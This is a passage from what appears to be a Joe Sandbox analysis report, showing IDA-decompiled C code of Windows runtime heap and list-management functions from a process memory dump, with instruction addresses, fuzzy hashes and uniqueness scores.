					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E04C0F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04BE7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04C09AE0();
					_t24 = L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













              0x04c47799
              0x04c4779a
              0x04c4779b
              0x04c477a3
              0x04c477ab
              0x04c477ae
              0x04c477b1
              0x04c477b1
              0x04c477bf
              0x04c477c4
              0x04c477c8
              0x04c477ce
              0x04c477d4
              0x04c477e0
              0x04c477e0
              0x04c477d6
              0x04c477d6
              0x04c477de
              0x00000000
              0x00000000
              0x04c477de
              0x04c477e5
              0x04c477f0
              0x04c477f3
              0x04c477f6
              0x04c477fd
              0x04c47800
              0x04c4780c
              0x04c47818
              0x04c4782b
              0x04c4781a
              0x04c47823
              0x04c47823
              0x04c47830
              0x04c47831
              0x04c47838
              0x04c4783d
              0x04c4783e
              0x04c4784f
              0x04c4784f
              0x04c4785a

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 500af4d254217f8d46039f9efe849c88c1602bb4f452da0f5cbfb2497fc34bf8
              • Instruction ID: 97ce4fb56c3b54d20daa64ea7cd160d8a968c5edde689fb685274d946111f70d
              • Opcode Fuzzy Hash: 500af4d254217f8d46039f9efe849c88c1602bb4f452da0f5cbfb2497fc34bf8
              • Instruction Fuzzy Hash: 2321AE72901604AFC725DF69D980E6BB7A9EF88350F10456DF90AD7790EB34EA00CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BFFD9B Relevance: .1, Instructions: 69COMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E04BFFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E04BD76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04BE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










              0x04bffd9b
              0x04bffda0
              0x04bffda1
              0x04bffdab
              0x04bffdad
              0x04bffdb0
              0x04bffdb8
              0x04bffe0f
              0x04bffde6
              0x04bffde9
              0x04bffdec
              0x04c3c0c0
              0x04bffdfe
              0x04bffe06
              0x04bffe06
              0x04c3c0c8
              0x04bffe2d
              0x04bffe2d
              0x00000000
              0x04bffe2d
              0x04c3c0d1
              0x04c3c0e0
              0x04c3c0e5
              0x04c3c0e5
              0x04c3c0e8
              0x00000000
              0x04c3c0e8
              0x04bffdf4
              0x00000000
              0x00000000
              0x04bffdf6
              0x04bffdfa
              0x04bffe1a
              0x04bffe1f
              0x04bffe1f
              0x04bffdfc
              0x00000000
              0x04bffdfc
              0x04bffdcc
              0x04bffdd0
              0x04bffe26
              0x00000000
              0x04bffe26
              0x04bffdd8
              0x04bffddb
              0x04bffddd
              0x04bffde0
              0x00000000

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
              • Instruction ID: 9d90c3707b45043b7f18cb6eec31fb9693da14b8a04ed66aa0ca51c33a75a57b
              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
              • Instruction Fuzzy Hash: 0B217976A00A40DFD735CF0AC940A76B7E5EB94B10F2485AEEA4987A11E730BD04EB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BC9240 Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E04BC9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x4c9f708);
				E04C1D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E04C095D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E04C095D0();
				_t33 =  *0x4cb84c4; // 0x0
				L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x4cb84c4; // 0x0
				L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x4cb84c4; // 0x0
				E04BE2280(L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4cb86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E04C095D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E04C095D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04BC9325();
					_t50 =  *0x4cb84c4; // 0x0
					return E04C1D0D1(L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















              0x04bc9240
              0x04bc9242
              0x04bc9247
              0x04bc924c
              0x04bc924e
              0x04bc9255
              0x04bc9257
              0x04bc925a
              0x04bc925f
              0x04bc925f
              0x04bc9266
              0x04bc9271
              0x04bc9276
              0x04bc9279
              0x04bc927e
              0x04bc9295
              0x04bc929a
              0x04bc92b1
              0x04bc92b6
              0x04bc92d7
              0x04bc92dc
              0x04bc92e0
              0x04bc92e6
              0x04bc92e8
              0x04bc92ee
              0x04bc9332
              0x04bc9333
              0x04bc9337
              0x04bc9338
              0x04bc933a
              0x04bc933a
              0x04bc933d
              0x04bc9342
              0x04bc9342
              0x04bc9345
              0x04bc9349
              0x04bc934e
              0x04bc9352
              0x04bc9357
              0x04bc92f4
              0x04bc92f4
              0x04bc92f6
              0x04bc92f9
              0x04bc9300
              0x04bc9306
              0x04bc9324
              0x04bc9324

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 46e3952246fd07d9fd655cdad038ec7d0c2e04debd48a4584fbdd32722d21195
              • Instruction ID: 503052d557611e8909130f7a314b744e51d232688fc7db03faef46fd2d4715b9
              • Opcode Fuzzy Hash: 46e3952246fd07d9fd655cdad038ec7d0c2e04debd48a4584fbdd32722d21195
              • Instruction Fuzzy Hash: EE211972041A00DFD725EF68CA40B59B7B9FF48708F1445ACA049876B2CB34F951DF94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BFB390 Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              C-Code - Quality: 54%
              			E04BFB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04BE2280(_t12, 0x4cb8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E04C000C2(0x4cb8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











              0x04bfb395
              0x04bfb3a2
              0x04bfb3a5
              0x04bfb3aa
              0x04bfb3b2
              0x04bfb3ba
              0x04bfb3bd
              0x04bfb3c0
              0x04bfb3c4
              0x04bfb3c9
              0x04c3a3e9
              0x04c3a3ed
              0x04c3a3f0
              0x04c3a3ff
              0x04c3a403
              0x04c3a409
              0x00000000
              0x00000000
              0x04c3a40b
              0x04c3a40b
              0x04c3a40f
              0x04c3a415
              0x04c3a423
              0x04c3a423
              0x04c3a415
              0x04bfb3d1
              0x04bfb3e8
              0x04bfb3e8
              0x04bfb3d9

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d16b686384b0207affd45bc3a15c53ddd4e34aab8957fda1a67d1d28bee29c8a
              • Instruction ID: 9bfcd904b1471b5d88ebf24b5320d3df934617724192d6dba183e905b0e44bf9
              • Opcode Fuzzy Hash: d16b686384b0207affd45bc3a15c53ddd4e34aab8957fda1a67d1d28bee29c8a
              • Instruction Fuzzy Hash: 4A1148733451109BDB189A15DD81A6B729BEBC5334F294169DA5A97380D932BC06C6D0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C446A7 Relevance: .1, Instructions: 59COMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E04C446A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04BE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E04C0F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E04BFD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L04BE77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











              0x04c446b7
              0x04c446ba
              0x04c446c5
              0x04c446c8
              0x04c446d0
              0x04c446d4
              0x04c446e6
              0x04c446e9
              0x04c446f4
              0x04c446ff
              0x04c44705
              0x04c44706
              0x04c4470c
              0x04c44713
              0x04c4471b
              0x04c44723
              0x04c44725
              0x04c446d6
              0x04c446d9
              0x04c446db
              0x04c446db
              0x04c44732

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
              • Instruction ID: b5b58827807aed45be8e37db037dff888091d0bfa4138f592f93c82f1cbd3da9
              • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
              • Instruction Fuzzy Hash: A8110272504208BBDB059F5DD8809BEB7B9EF85304F1080AAF94487350DA319D55D7A4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BD766D Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              C-Code - Quality: 94%
              			E04BD766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E04BFF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E04BFF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04BE4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










              0x04bd7672
              0x04bd767f
              0x04bd7689
              0x04bd76de
              0x04bd76de
              0x04bd768b
              0x04bd7691
              0x04bd7693
              0x04bd7697
              0x00000000
              0x04bd7699
              0x04bd76a8
              0x00000000
              0x04bd76aa
              0x04bd76ad
              0x04bd76b1
              0x00000000
              0x04bd76b3
              0x04bd76b3
              0x04bd76b5
              0x04bd76ba
              0x04bd76bc
              0x04bd76bc
              0x04bd76c0
              0x00000000
              0x04bd76c2
              0x04bd76ce
              0x04bd76ce
              0x04bd76c0
              0x04bd76b1
              0x04bd76a8
              0x04bd7697
              0x04bd76d9

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
              • Instruction ID: 75ca9fa3e795380294b2f96e773075273cc89765863456bc816c304f7852f6cf
              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
              • Instruction Fuzzy Hash: DE018432700119AFD720AE5EDC41EAB77ADEB84B60B2405E9B91CCB250FE30ED0197A0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BC9080 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              C-Code - Quality: 69%
              			E04BC9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x4cb85ec;
				E04BE2280(_t48, 0x4cb85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E04BDFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x4cb538c; // 0x774968c8
					if( *_t84 != 0x4cb5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x4c9f6e8);
						E04C1D0E8(0x4cb85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E04C988F5(_t80, _t85, 0x4cb5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x4cb86c0; // 0x31007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x4cb86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04BE2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E04C988F5(0x4cb85ec, _t85, 0x4cb5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E04C0AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x4cbb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x4cb84c0;
																			if(_t82 >=  *0x4cb84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04C99063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E04BC922A(_t99);
										_t64 = E04BE7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04C98B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x4cb86c0; // 0x31007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x4cb86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x4cb86bc;
													_t87 = 0x4cb86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04BC9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x4cb86c4;
												_t87 = 0x4cb86c0;
												L27:
												E04BF9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E04C1D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4cb5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x4cb538c = _t51;
						goto L6;
					}
				}
			}




















              0x04bc9082
              0x04bc9083
              0x04bc9084
              0x04bc9085
              0x04bc9087
              0x04bc9096
              0x04bc9098
              0x04bc9098
              0x04bc909e
              0x04bc90a8
              0x04bc90e7
              0x04bc90e7
              0x04bc90aa
              0x04bc90b0
              0x04bc90b7
              0x04bc90bd
              0x04bc90dd
              0x04bc90e6
              0x04bc90bf
              0x04bc90bf
              0x04bc90c7
              0x04bc90cf
              0x04bc90f1
              0x04bc90f2
              0x04bc90f4
              0x04bc90f5
              0x04bc90f6
              0x04bc90f7
              0x04bc90f8
              0x04bc90f9
              0x04bc90fa
              0x04bc90fb
              0x04bc90fc
              0x04bc90fd
              0x04bc90fe
              0x04bc90ff
              0x04bc9100
              0x04bc9102
              0x04bc9107
              0x04bc910c
              0x04bc9110
              0x04bc9113
              0x04bc9115
              0x04bc9136
              0x04bc913f
              0x04bc9143
              0x04c237e4
              0x04c237e4
              0x04bc9117
              0x04bc9117
              0x04bc911d
              0x00000000
              0x04bc911f
              0x04bc911f
              0x04bc9125
              0x00000000
              0x04bc9127
              0x04bc912d
              0x04bc9130
              0x04bc9134
              0x04bc9158
              0x04bc915d
              0x04bc9161
              0x04bc9168
              0x04c23715
              0x04bc916e
              0x04bc916e
              0x04bc9175
              0x04bc9177
              0x04bc917e
              0x04bc917f
              0x04bc9182
              0x04bc9182
              0x04bc9187
              0x04bc9187
              0x04bc918a
              0x04bc918d
              0x04bc918f
              0x04bc9192
              0x04bc9195
              0x04bc9198
              0x04bc9198
              0x04bc9198
              0x04bc919a
              0x00000000
              0x00000000
              0x04c2371f
              0x04c23721
              0x04c23727
              0x04c2372f
              0x04c23733
              0x04c23735
              0x04c23738
              0x04c2373b
              0x04c2373d
              0x04c23740
              0x00000000
              0x04c23746
              0x04c23746
              0x04c23749
              0x00000000
              0x04c2374f
              0x04c2374f
              0x04c23751
              0x04c23757
              0x04c23759
              0x04c2375c
              0x04c2375c
              0x04c2375e
              0x04c2375e
              0x04c23761
              0x04c23764
              0x00000000
              0x00000000
              0x04c23766
              0x04c23768
              0x04c237a3
              0x04c237a3
              0x04c237a5
              0x04c237a7
              0x04c237ad
              0x04c237b0
              0x04c237b2
              0x04c237bc
              0x04c237c2
              0x04c237c2
              0x04c237b2
              0x04bc9187
              0x04bc9187
              0x04bc918a
              0x04bc918d
              0x04bc918f
              0x04bc9192
              0x04bc9195
              0x00000000
              0x04bc9195
              0x00000000
              0x04c2376a
              0x04c2376a
              0x04c2376a
              0x04c2376c
              0x04c2376c
              0x04c2376f
              0x04c23775
              0x00000000
              0x00000000
              0x04c23777
              0x04c23779
              0x04c23782
              0x04c23787
              0x04c23789
              0x04c23790
              0x04c23790
              0x04c2378b
              0x04c2378b
              0x04c2378b
              0x04c23792
              0x04c23795
              0x00000000
              0x04c23795
              0x00000000
              0x04c23779
              0x04c23798
              0x00000000
              0x04c23798
              0x00000000
              0x04c23768
              0x04c2379b
              0x04c2379b
              0x04c23751
              0x04c23749
              0x00000000
              0x04c23740
              0x04bc91a0
              0x04bc91a3
              0x04bc91a9
              0x04bc91b0
              0x00000000
              0x04bc91b0
              0x04bc9187
              0x04bc91b4
              0x04bc91b4
              0x04bc91bb
              0x04bc91c0
              0x04bc91c5
              0x04bc91c7
              0x04c237da
              0x04bc91cd
              0x04bc91cd
              0x04bc91cd
              0x04bc91d2
              0x04bc91d5
              0x04bc9239
              0x04bc9239
              0x04bc91d7
              0x04bc91db
              0x04bc91e1
              0x04bc91e7
              0x04bc91fd
              0x04bc9203
              0x04bc921e
              0x04bc9223
              0x00000000
              0x04bc9205
              0x04bc9205
              0x04bc9208
              0x04bc920c
              0x04bc9214
              0x04bc9214
              0x04bc920c
              0x04bc91e9
              0x04bc91e9
              0x04bc91ee
              0x04bc91f3
              0x04bc91f3
              0x04bc91f3
              0x04bc91e7
              0x00000000
              0x00000000
              0x00000000
              0x04bc9134
              0x04bc9125
              0x04bc911d
              0x04bc914e
              0x04bc90d1
              0x04bc90d1
              0x04bc90d3
              0x04bc90d6
              0x04bc90d8
              0x00000000
              0x04bc90d8
              0x04bc90cf

              Memory Dump Source
